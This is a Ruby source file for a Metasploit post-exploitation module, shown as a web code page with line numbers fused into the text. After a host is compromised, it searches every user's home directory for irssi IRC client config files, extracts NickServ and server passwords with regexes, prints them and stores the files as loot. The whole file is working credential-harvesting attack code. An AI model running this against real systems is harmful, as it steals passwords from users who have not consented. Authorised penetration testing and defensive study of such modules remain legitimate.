Path: blob/master/modules/post/multi/gather/irssi_creds.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Unix89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Multi Gather IRSSI IRC Password(s)',14'Description' => %q{15This module grabs IRSSI IRC credentials.16},17'Author' => [18'Jonathan Claudius <jclaudius[at]mozilla.com>',19],20'Platform' => %w[bsd linux osx unix],21'SessionTypes' => %w[shell],22'License' => MSF_LICENSE,23'Notes' => {24'Stability' => [CRASH_SAFE],25'SideEffects' => [],26'Reliability' => []27}28)29)30end3132def run33print_status('Finding ~/.irssi/config')34paths = enum_user_directories.map { |d| d + '/.irssi/config' }35paths = paths.select { |f| file?(f) }3637if paths.empty?38print_error('No users found with a ~/.irssi/config file')39return40end4142download_passwords(paths)43end4445# Example of what we're looking for in the config...46#47# ***Identify Password Example***48# autosendcmd = "/msg nickserv identify example_password ;wait 2000";49#50# ***Network Password Example***51# password = "example_password";52#53def contains_passwords?(path)54data = read_file(path)55identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})56network_passwords = data.scan(/^?password = "([^\s]+)"/)5758passwords = identify_passwords.flatten + network_passwords.flatten5960if passwords.any?61print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")62return true63end6465false66end6768def download_passwords(paths)69print_status "Looting #{paths.count} files"7071paths.each do |path|72path.chomp!73next if ['.', '..'].include?(path)7475next unless contains_passwords?(path)7677loot_path = store_loot(78'irssi config file',79'text/plain',80session,81read_file(path),82path,83'IRC Password'84)85print_good("irssi config with passwords stored in #{loot_path}")86end87end88end899091